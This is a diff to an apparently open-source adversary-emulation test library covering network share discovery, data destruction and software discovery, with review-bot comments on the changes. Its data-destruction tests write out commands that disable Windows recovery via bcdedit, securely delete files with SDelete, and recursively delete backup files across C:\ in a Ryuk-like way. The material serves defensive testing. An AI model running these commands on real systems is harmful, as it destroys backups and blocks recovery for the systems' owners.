diff --git a/atomics/T1135/T1135.md b/atomics/T1135/T1135.md
index aead490e..5be02e02 100644
--- a/atomics/T1135/T1135.md
+++ b/atomics/T1135/T1135.md
@@ -26,7 +26,7 @@ Cloud virtual networks may contain remote network shares or file storage service
 - [Atomic Test #3 - Network Share Discovery PowerShell](#atomic-test-3---network-share-discovery-powershell)
-- [Atomic Test #4 - View avaliabe share drives](#atomic-test-4---view-avaliabe-share-drives)
+- [Atomic Test #4 - View available share drives](#atomic-test-4---view-available-share-drives)
@@ -97,7 +97,7 @@ get-smbshare -Name #{computer_name}

-## Atomic Test #4 - View avaliabe share drives
+## Atomic Test #4 - View available share drives
 View information about all of the resources that are shared on the local computer
 **Supported Platforms:** Windows
diff --git a/atomics/T1485/T1485.md b/atomics/T1485/T1485.md
index ebd00c73..332f87b0 100644
--- a/atomics/T1485/T1485.md
+++ b/atomics/T1485/T1485.md
@@ -56,7 +56,7 @@ wbadmin.exe delete catalog -quiet
 ## Atomic Test #3 - Windows - Disable Windows Recovery Console Repair
-Disables repair by the Windows Recovery Console on boot.
+Disables repair by the Windows Recovery Console on boot. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
 **Supported Platforms:** Windows
@@ -69,6 +69,11 @@ bcdedit.exe /set {default} recoveryenabled no
 ```
+#### Cleanup Commands:
+```
+bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures
+bcdedit.exe /set {default} recoveryenabled yes
+```
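Review bot: The new Cleanup Commands block writes hard-coded values (`bootstatuspolicy DisplayAllFailures`, `recoveryenabled yes`) rather than restoring whatever the host had before the test, so on an image that shipped with a different boot policy the cleanup still leaves the BCD changed. Those two values are, as far as I know, the Windows defaults, which is fine for a lab box, but the description should say so, e.g. `Cleanup resets both BCD elements to their Windows defaults; capture the output of bcdedit /enum {default} first if the host uses non-default values.` Both cleanup lines need the same elevated context as the bcdedit commands above them; the executor line that would carry the elevation flag is outside this hunk, so I cannot confirm it is set.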

@@ -83,11 +88,13 @@ Requires the download of either Sysinternals Suite or the individual SDelete uti
 #### Inputs
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| file_to_overwrite | Path of file to overwrite and remove | Path | C:\some\file.txt|
+| sdelete_path | Path to sdelete.exe | Path | |
-#### Run it with `command_prompt`!
+#### Run it with `powershell`!
 ```
-sdelete.exe #{file_to_overwrite}
+New-Item $env:TEMP\T1485.txt
+Set-Location #{sdelete_path}
+.\sdelete.exe -accepteula $env:TEMP\T1485.txt
 ```
@@ -97,7 +104,6 @@ sdelete.exe #{file_to_overwrite}
 ## Atomic Test #5 - macOS/Linux - Overwrite file with DD
 Overwrites and deletes a file using DD.
- To stop the test, break the command with CTRL/CMD+C.
 **Supported Platforms:** CentOS, Linux, macOS, Ubuntu
@@ -125,7 +131,7 @@ Deletes backup files in a manner similar to Ryuk ransomware.
 **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
+#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
 ```
 del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
 ```
diff --git a/atomics/T1518/T1518.md b/atomics/T1518/T1518.md
index 1b4f1e39..25766d8b 100644
--- a/atomics/T1518/T1518.md
+++ b/atomics/T1518/T1518.md
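Review bot: In the new `powershell` executor the `sdelete_path` input is documented as "Path to sdelete.exe" but consumed as a directory (`Set-Location #{sdelete_path}` followed by `.\sdelete.exe`), so a user who supplies the full executable path gets a Set-Location failure, and with the empty default the line presumably collapses to a bare `Set-Location`, after which `.\sdelete.exe` is resolved against whatever directory that lands in. Calling `& "#{sdelete_path}\sdelete.exe" -accepteula $env:TEMP\T1485.txt` without changing directory, and describing the input as the folder that contains sdelete.exe, would make the input and the command agree. `New-Item $env:TEMP\T1485.txt` also errors on a re-run if the file survived an earlier attempt, and it creates a zero-byte file, so the overwrite pass this test exists to exercise has nothing to destroy; `New-Item $env:TEMP\T1485.txt -ItemType File -Force -Value 'T1485'` stages a target that is both repeatable and non-empty.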
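Review bot: The new `Elevation Required` header on the Ryuk test says nothing about blast radius: `del /s /f /q c:\*.VHD ...` walks the entire system drive and permanently removes every matching file, real backups included, and unlike the SDelete test above it stages no target of its own. The description line just before this hunk (`Deletes backup files in a manner similar to Ryuk ransomware.`) should carry a warning such as `WARNING: recursively and irreversibly deletes all matching backup files under C:\; run only on a disposable test host.`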
@@ -33,10 +33,10 @@ Adversaries may attempt to get a listing of all software that is installed on th
 **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
+#### Run it with `powershell`!
 ```
-POWERSHELL.EXE "Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize"
-powershell.exe "Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize"
+Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize
+Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize
 ```
diff --git a/atomics/index.md b/atomics/index.md
index 77466f74..e983f144 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -572,7 +572,7 @@
 - Atomic Test #1: Network Share Discovery [macos, linux]
 - Atomic Test #2: Network Share Discovery command prompt [windows]
 - Atomic Test #3: Network Share Discovery PowerShell [windows]
- - Atomic Test #4: View avaliabe share drives [windows]
+ - Atomic Test #4: View available share drives [windows]
 - [T1040 Network Sniffing](./T1040/T1040.md)
 - Atomic Test #1: Packet Capture Linux [linux]
 - Atomic Test #2: Packet Capture MacOS [macos]
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 0e5fe59c..ad432262 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
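Review bot: The second `Get-ItemProperty HKLM:\Software\Wow6432Node\...` line raises a path-not-found error on 32-bit Windows installs, where the WOW6432Node key does not exist, so the new single-script executor emits an error mid-test instead of a clean listing on those hosts. Appending `-ErrorAction SilentlyContinue` to that line keeps the 64-bit behaviour and tolerates the missing key. Per-user installs recorded under `HKCU:\Software\Microsoft\Windows\CurrentVersion\Uninstall` are still not enumerated, which is worth stating in the description if that narrower scope is intentional.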
@@ -15787,9 +15787,9 @@ impact:
 '
 - name: Windows - Disable Windows Recovery Console Repair
- description: "Disables repair by the Windows Recovery Console on boot. \nThis
- technique is used by numerous ransomware families and APT malware such as
- Olympic Destroyer.\n"
+ description: |
+ Disables repair by the Windows Recovery Console on boot.
+ This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
 supported_platforms:
 - windows
 executor:
@@ -15798,6 +15798,9 @@ impact:
 command: |
 bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
 bcdedit.exe /set {default} recoveryenabled no
+ cleanup_command: |
+ bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures
+ bcdedit.exe /set {default} recoveryenabled yes
 - name: Windows - Overwrite file with Sysinternals SDelete
 description: |
 Overwrites and deletes a file using Sysinternals SDelete.
@@ -15805,19 +15808,19 @@ impact:
 supported_platforms:
 - windows
 input_arguments:
- file_to_overwrite:
- description: Path of file to overwrite and remove
+ sdelete_path:
+ description: Path to sdelete.exe
 type: Path
- default: C:\some\file.txt
+ default: ''
 executor:
- name: command_prompt
- command: 'sdelete.exe #{file_to_overwrite}
-'
+ name: powershell
+ command: |
+ New-Item $env:TEMP\T1485.txt
+ Set-Location #{sdelete_path}
+ .\sdelete.exe -accepteula $env:TEMP\T1485.txt
 - name: macOS/Linux - Overwrite file with DD
 description: |
 Overwrites and deletes a file using DD.
- To stop the test, break the command with CTRL/CMD+C.
 supported_platforms:
 - centos
@@ -15846,8 +15849,11 @@ impact:
 - windows
 executor:
 name: command_prompt
- command: del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.*
+ elevation_required: true
+ command: 'del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.*
 c:\backup*.* c:\*.set c:\*.win c:\*.dsk
+
+'
 '':
 technique:
 x_mitre_data_sources:
@@ -17410,7 +17416,7 @@ discovery:
 command: |
 net view \\#{computer_name}
 get-smbshare -Name #{computer_name}
- - name: View avaliabe share drives
+ - name: View available share drives
 description: View information about all of the resources that are shared on the local computer
 supported_platforms:
@@ -18337,11 +18343,11 @@ discovery:
 supported_platforms:
 - windows
 executor:
- name: command_prompt
+ name: powershell
 elevation_required: false
 command: |
- POWERSHELL.EXE "Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize"
- powershell.exe "Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize"
+ Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize
+ Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize
 T1082:
 technique:
 x_mitre_permissions_required:
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index a502cd49..d8af5bb9 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -409,7 +409,7 @@
 - [T1135 Network Share Discovery](./T1135/T1135.md)
 - Atomic Test #2: Network Share Discovery command prompt [windows]
 - Atomic Test #3: Network Share Discovery PowerShell [windows]
- - Atomic Test #4: View avaliabe share drives [windows]
+ - Atomic Test #4: View available share drives [windows]
 - [T1040 Network Sniffing](./T1040/T1040.md)
 - Atomic Test #3: Packet Capture Windows Command Prompt [windows]
 - Atomic Test #4: Packet Capture PowerShell [windows]